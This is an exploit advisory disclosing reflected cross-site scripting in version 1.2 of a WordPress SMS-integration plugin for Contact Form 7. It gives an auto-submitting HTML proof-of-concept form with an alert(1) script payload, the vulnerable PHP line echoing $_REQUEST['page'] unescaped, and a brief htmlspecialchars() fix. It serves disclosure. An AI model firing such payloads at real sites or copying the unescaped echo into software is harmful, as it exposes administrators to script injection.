Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting

 ___________________________________________________
|
| Exploit Title: Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/
| Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip
| Version: 1.2
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________

 Exploit :
 
<html>
<body onload="document.exploit.submit()">
   <form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/
   cf7-international-sms-integration/includes/admin/class-sms-log-display.php "> 
   <input type="hidden" name="page" value=""/><script>alert(1)</script>" />
	<input type="hidden" name="tab" value="smslogs" />
	   
</form>
</body>
</html>

__________________________________________________

 Vulnerable method :
	 $_GET

 Vulnerable File :
     wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php

 Vulnerable code:
 
 
line 366 :
  <form id="smslog-filter" method="get" action="<?php echo $current_url; ?> "> 
            <input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
            <input type="hidden" name="tab" value="smslogs" />
            <?php $testListTable->display() ?> 
</form>
			  
				  
__________________________________________________

#patch:

For fix this vulnerability you use htmlspecialchars() function .
__________________________________________________

Discovered By : M.R.S.L.Y 
__________________________________________________